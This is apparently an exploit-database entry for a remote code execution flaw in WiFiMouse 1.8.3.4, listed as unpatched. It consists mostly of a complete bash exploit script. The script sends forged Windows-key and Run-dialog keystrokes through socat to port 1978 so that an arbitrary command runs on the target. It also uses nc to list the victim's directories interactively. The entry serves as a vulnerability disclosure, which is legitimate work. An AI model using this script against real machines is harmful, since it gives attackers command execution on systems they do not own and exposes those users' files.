WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)

vendor:

WiFiMouse

by:

Febin

9.8

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: WiFiMouse

Affected Version From: 1.8.3.4

Affected Version To: 1.8.3.4

Patch Exists: NO

Related CWE:

CPE: a:necta:wifimouse

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2022

WiFiMouse 1.8.3.4 – Remote Code Execution (RCE)

WiFiMouse 1.8.3.4 is vulnerable to Remote Code Execution (RCE) due to improper input validation. An attacker can send malicious commands to the target system via the MouseServer service on port 1978, which can be used to execute arbitrary code on the target system.

Mitigation:

Input validation should be implemented to prevent malicious commands from being executed on the target system.

Source

Exploit-DB raw data:

# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
# Date: 15-08-2022
# Author: Febin
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.4
# Tested on: Windows 10

#!/bin/bash
printf "
  WiFiMouse / MouseServer 1.8.3.4 Exploit
        
            by FEBIN

"

printf "[*] Enter the Target IP Address: "
read TARGET



rce(){
printf "[*] Enter the Command to execute on the Target:  "
read CMD

sh -c "echo 'key  9[R] WIN d';sleep 1;echo 'key  9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
}

dirlist(){

echo "[*] User's Home Directory Contents:"

echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-

while $true
do
printf "\nList Directory:> "
read DIR
echo "[+] Contents of $DIR: "
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
done


}

printf "
 [1] Remote Command Execution
 [2] Directory Listing
 
 "
printf "Enter Your Choice (1 or 2) : "
read CHOICE

if [[ $CHOICE == "1" ]]
then
rce
elif [[ $CHOICE == "2" ]]
then
dirlist

else
echo "[-] Invalid Choice!"
fi